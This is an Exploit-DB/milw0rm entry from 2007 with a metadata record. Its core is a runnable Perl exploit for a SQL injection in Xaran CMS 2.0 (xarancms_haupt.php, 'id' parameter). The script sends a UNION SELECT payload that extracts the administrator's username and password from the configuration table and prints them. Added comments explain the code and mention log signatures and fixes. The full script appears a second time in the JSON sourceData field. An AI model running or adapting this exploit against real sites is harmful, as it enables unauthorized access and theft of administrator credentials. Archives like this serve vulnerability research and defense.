ID EDB-ID:3298
Type exploitdb
Reporter ajann
Modified 2007-02-13T00:00:00
Description
Xaran Cms <= 2.0 (xarancms_haupt.php) SQL Injection Exploit. Webapps exploit for php platform
#!/usr/bin/perl
#[Script Name: Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.xarancms.de
#[$$ : 149.00 EUR
#[.. : ajann,Turkey
use IO::Socket;
# Usage guard: when no command-line argument is given, print the usage
# banner and stop. The banner is a runtime string and is kept as published.
if(@ARGV < 1){
print "
[========================================================================
[// Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
# None of these are declared with "my", so they are all package globals.
# The first command-line argument is the host name of the site.
$server = $ARGV[0];
# Removes every literal "http://" from the argument. The replacement is
# empty, so the /e flag has nothing to evaluate.
$server =~ s/(http:\/\/)//eg;
# $host is later used as the start of the request target, so the request
# line carries an absolute URL rather than a bare path.
$host = "http://".$server;
# Fixed to plain HTTP on port 80.
$port = "80";
# Script and parameter the request is aimed at: the "id" query parameter
# of xarancms_haupt.php.
$file = "/xarancms_haupt.php?id=";
# Interactive prompt for the directory the CMS is installed under.
print "Script <DIR> : ";
$dir = <STDIN>;
# chop removes the last character unconditionally (normally the newline).
chop ($dir);
# Any input containing the substring "exit" aborts the run.
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
# The only validation of the directory is that it contains a "/" somewhere;
# the empty block is the accepted case, the else branch aborts.
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
# Value sent in the "id" parameter. URL-decoded, it is "-1 union select
# concat(...) from xarancms_konfiguration": the concat() joins the literal
# labels "username:" and " password:" (spelled as char() codes) with the
# columns konfiguration_benutzername and konfiguration_benutzerkennwort.
# Defensive note: an "id" value on xarancms_haupt.php that is not a plain
# number, here containing "union%20select" and the table name
# xarancms_konfiguration, is what this script leaves in web-server access logs.
# NOTE(review): the payload shape suggests the application places "id" into a
# SQL statement without validation. The application-side fix would be integer
# validation or a parameterized query. Confirm against the CMS source, which
# is not shown here.
$target = "-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),konfiguration_benutzername,char(32,112,97,115,115,119,111,114,100,58),konfiguration_benutzerkennwort)%20from%20xarancms_konfiguration";
# Full request target: "http://" + host + directory + script + parameter value.
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
# Plain TCP connection to the host on $port; the script dies with a message
# if the socket cannot be created.
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
# Hand-written HTTP/1.1 request. As written it has three traits a defender
# can match on: the request target is an absolute URL, lines end in a bare
# "\n" rather than "\r\n", and the only headers are Host, Accept and
# Connection, with no User-Agent.
# None of the print calls on the socket are checked for failure.
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
# Printed after the request has been written, not right after connecting.
print "+ Connected!...\n";
#Getting
# Reads the response one line at a time and matches each line against four
# patterns. The socket is never closed explicitly, and nothing is printed if
# no pattern matches.
while($answer = <$socket>) {
# Success marker: the "username:" label from the request appears right after
# the page text "letzte Aktualisierung:" (German for "last update").
# NOTE(review): this implies the page prints the query result in that field.
# Confirm against the CMS template.
if ($answer =~ /letzte Aktualisierung: username:(.*?) pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
# Second capture: text between the "password:" label and the closing </div>.
# Whether the stored value is a hash or plain text cannot be told from here.
if ($answer =~ /password:(.*?)<\/div>/){
print "+ Password: $1\n";
}
# Failure markers: either string in the response ends the run.
# NOTE(review): matching on "Syntax error" presumes the application shows
# database error text to the client. Suppressing such output is a hardening
# step to verify on the server.
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2007-02-13]
{"id": "EDB-ID:3298", "hash": "eb9d9ec84d1ff207e2cdc2dd0507eeb6", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Xaran CMS <= 2.0 xarancms_haupt.php SQL Injection Exploit", "description": "Xaran Cms <= 2.0 (xarancms_haupt.php) SQL Injection Exploit. Webapps exploit for php platform", "published": "2007-02-13T00:00:00", "modified": "2007-02-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/3298/", "reporter": "ajann", "references": [], "cvelist": [], "lastseen": "2016-01-31T18:09:32", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-01-31T18:09:32"}, "dependencies": {"references": [], "modified": "2016-01-31T18:09:32"}, "vulnersScore": 0.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3298/", "sourceData": "#!/usr/bin/perl\n#[Script Name: Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit\n#[Coded by : ajann\n#[Author : ajann\n#[Contact : :(\n#[S.Page : http://www.xarancms.de\n#[$$ : 149.00 EUR\n#[.. 
: ajann,Turkey\n\nuse IO::Socket;\nif(@ARGV < 1){\nprint \"\n[========================================================================\n[// \tXaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit\n[// Usage: exploit.pl [target]\n[// Example: exploit.pl victim.com\n[// Example: exploit.pl victim.com\n[// Vuln&Exp : ajann\n[========================================================================\n\";\nexit();\n}\n#Local variables\n$server = $ARGV[0];\n$server =~ s/(http:\\/\\/)//eg;\n$host = \"http://\".$server;\n$port = \"80\";\n$file = \"/xarancms_haupt.php?id=\";\n\nprint \"Script <DIR> : \";\n$dir = <STDIN>;\nchop ($dir);\n\nif ($dir =~ /exit/){\nprint \"-- Exploit Failed[You Are Exited] \\n\";\nexit();\n}\n\nif ($dir =~ /\\//){}\nelse {\nprint \"-- Exploit Failed[No DIR] \\n\";\nexit();\n }\n\n\n$target = \"-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),konfiguration_benutzername,char(32,112,97,115,115,119,111,114,100,58),konfiguration_benutzerkennwort)%20from%20xarancms_konfiguration\";\n$target = $host.$dir.$file.$target;\n\n#Writing data to socket\nprint \"+**********************************************************************+\\n\";\nprint \"+ Trying to connect: $server\\n\";\n$socket = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"$port\") || die \"\\n+ Connection failed...\\n\";\nprint $socket \"GET $target HTTP/1.1\\n\";\nprint $socket \"Host: $server\\n\";\nprint $socket \"Accept: */*\\n\";\nprint $socket \"Connection: close\\n\\n\";\nprint \"+ Connected!...\\n\";\n#Getting\nwhile($answer = <$socket>) {\nif ($answer =~ /letzte Aktualisierung: username:(.*?) pass/){\nprint \"+ Exploit succeed! 
Getting admin information.\\n\";\nprint \"+ ---------------- +\\n\";\nprint \"+ Username: $1\\n\";\n}\n\nif ($answer =~ /password:(.*?)<\\/div>/){\nprint \"+ Password: $1\\n\";\n}\n\nif ($answer =~ /Syntax error/) { \nprint \"+ Exploit Failed : ( \\n\";\nprint \"+**********************************************************************+\\n\";\nexit(); \n}\n\nif ($answer =~ /Internal Server Error/) {\nprint \"+ Exploit Failed : ( \\n\";\nprint \"+**********************************************************************+\\n\";\nexit(); \n}\n }\n\n# milw0rm.com [2007-02-13]\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}